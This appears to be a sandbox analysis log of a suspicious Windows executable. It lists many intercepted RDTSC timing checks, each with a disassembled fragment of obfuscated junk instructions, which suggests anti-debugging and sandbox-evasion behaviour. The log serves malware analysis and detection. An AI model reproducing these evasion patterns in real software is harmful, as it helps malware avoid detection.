Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45F398 second address: 45F3A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0133 second address: 4DA019B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4AE0E87EC1h 0x00000009 sub ah, FFFFFFB6h 0x0000000c jmp 00007F4AE0E87EC1h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4AE0E87EBFh 0x00000021 xor eax, 6CD31CEEh 0x00000027 jmp 00007F4AE0E87EC9h 0x0000002c popfd 0x0000002d mov cx, F077h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA019B second address: 4DA022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4AE04F8893h 0x00000009 or si, 42FEh 0x0000000e jmp 00007F4AE04F8899h 0x00000013 popfd 0x00000014 mov esi, 3D0D2347h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov bx, 185Eh 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F4AE04F888Dh 0x0000002d adc cx, F7E6h 0x00000032 jmp 00007F4AE04F8891h 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F4AE04F8890h 0x0000003e or al, FFFFFF88h 0x00000041 jmp 00007F4AE04F888Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA022A second address: 4DA0230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0230 second address: 4DA0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0234 second address: 4DA0247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 mov si, di 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80CFB second address: 4D80DB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d mov ebx, 4A066DBEh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F4AE04F8895h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F4AE04F888Ch 0x00000022 xor si, F6B8h 0x00000027 jmp 00007F4AE04F888Bh 0x0000002c popfd 0x0000002d mov bx, ax 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F4AE04F8897h 0x0000003b and si, 8D2Eh 0x00000040 jmp 00007F4AE04F8899h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007F4AE04F8890h 0x0000004c sub cl, FFFFFFA8h 0x0000004f jmp 00007F4AE04F888Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80DB9 second address: 4D80DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE0E87EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80DD1 second address: 4D80DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD0010 second address: 4DD0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD0014 second address: 4DD001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD001A second address: 4DD0032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD0032 second address: 4DD0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD0037 second address: 4DD008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4AE0E87EC2h 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F4AE0E87EBBh 0x00000019 and ax, 29BEh 0x0000001e jmp 00007F4AE0E87EC9h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD008D second address: 4DD00A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4AE04F888Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DD00A8 second address: 4DD00B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D600F4 second address: 4D600F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D600F8 second address: 4D600FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D600FC second address: 4D60102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60102 second address: 4D6018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4AE0E87EC6h 0x0000000f push eax 0x00000010 jmp 00007F4AE0E87EBBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 jmp 00007F4AE0E87EC4h 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F4AE0E87EC3h 0x00000029 sub cl, FFFFFFBEh 0x0000002c jmp 00007F4AE0E87EC9h 0x00000031 popfd 0x00000032 mov dx, cx 0x00000035 popad 0x00000036 push dword ptr [ebp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D6018F second address: 4D60193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60193 second address: 4D60197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60197 second address: 4D6019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80A1A second address: 4D80A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80A33 second address: 4D80A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 72h 0x00000005 mov eax, 6EDF778Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80A47 second address: 4D80A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80A4B second address: 4D80A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80A51 second address: 4D80ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4AE0E87EC4h 0x00000009 and ah, 00000068h 0x0000000c jmp 00007F4AE0E87EBBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F4AE0E87EC5h 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F4AE0E87EBEh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ebx 0x00000029 pop esi 0x0000002a pushfd 0x0000002b jmp 00007F4AE0E87EC9h 0x00000030 adc esi, 0921E096h 0x00000036 jmp 00007F4AE0E87EC1h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80ADC second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov bx, CD1Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4AE04F8897h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D805D8 second address: 4D805DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D805DC second address: 4D805E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D805E0 second address: 4D805E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D805E6 second address: 4D80627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, A30Fh 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4AE0E87EBCh 0x00000015 sub ax, 84B8h 0x0000001a jmp 00007F4AE0E87EBBh 0x0000001f popfd 0x00000020 mov ebx, eax 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4AE0E87EBCh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80627 second address: 4D80636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80636 second address: 4D8063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8063C second address: 4D80640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80640 second address: 4D80644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80644 second address: 4D80654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80654 second address: 4D80658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80658 second address: 4D8065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80515 second address: 4D8051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8051B second address: 4D8051F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8051F second address: 4D80598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F4AE0E87EBFh 0x00000012 pop edx 0x00000013 movzx eax, di 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F4AE0E87EC7h 0x0000001d mov ebp, esp 0x0000001f jmp 00007F4AE0E87EC6h 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4AE0E87EC7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80598 second address: 4D8059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D802FC second address: 4D80300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80300 second address: 4D80304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80304 second address: 4D8030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0F3B second address: 4DC0F4F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, cx 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0F4F second address: 4DC0F96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F4AE0E87EC9h 0x00000014 sbb si, BE66h 0x00000019 jmp 00007F4AE0E87EC1h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0F96 second address: 4DC0FA7 instructions: 0x00000000 rdtsc 0x00000002 mov ax, F697h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0FA7 second address: 4DC0FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA04B5 second address: 4DA04BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA04BB second address: 4DA04BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA04BF second address: 4DA04E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4AE04F888Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA04E2 second address: 4DA04E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA04E7 second address: 4DA0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 2130h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov cx, 98EBh 0x00000011 mov di, si 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F4AE04F888Ah 0x0000001b mov ebp, esp 0x0000001d jmp 00007F4AE04F8890h 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 push ecx 0x00000027 mov ecx, edi 0x00000029 pop edi 0x0000002a mov ecx, 79EC98B5h 0x0000002f popad 0x00000030 and dword ptr [eax], 00000000h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F4AE04F888Ah 0x0000003c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0538 second address: 4DA053C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA053C second address: 4DA0542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0542 second address: 4DA0548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0548 second address: 4DA054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA054C second address: 4DA0587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax+04h], 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4AE0E87EC7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0587 second address: 4DA059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE04F8894h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80443 second address: 4D80449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80449 second address: 4D80467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4AE04F8893h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80467 second address: 4D8046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D8046D second address: 4D80471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D80471 second address: 4D804BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F4AE0E87EC7h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov dx, ax 0x00000016 mov eax, 094FD917h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4AE0E87EC9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA001B second address: 4DA0073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4AE04F888Fh 0x00000009 sbb eax, 761D71EEh 0x0000000f jmp 00007F4AE04F8899h 0x00000014 popfd 0x00000015 mov esi, 4DE08177h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F4AE04F888Ah 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4AE04F888Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0073 second address: 4DA0077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0077 second address: 4DA007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA007D second address: 4DA0093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov cl, 0Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0093 second address: 4DA00A1 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 0EE1BE0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov si, dx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00A1 second address: 4DA00A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00A5 second address: 4DA00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4AE04F8895h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00C7 second address: 4DA00DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00DC second address: 4DA00E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00E2 second address: 4DA00E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA00E6 second address: 4DA0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4AE04F8890h 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0105 second address: 4DA010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0335 second address: 4DA0339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
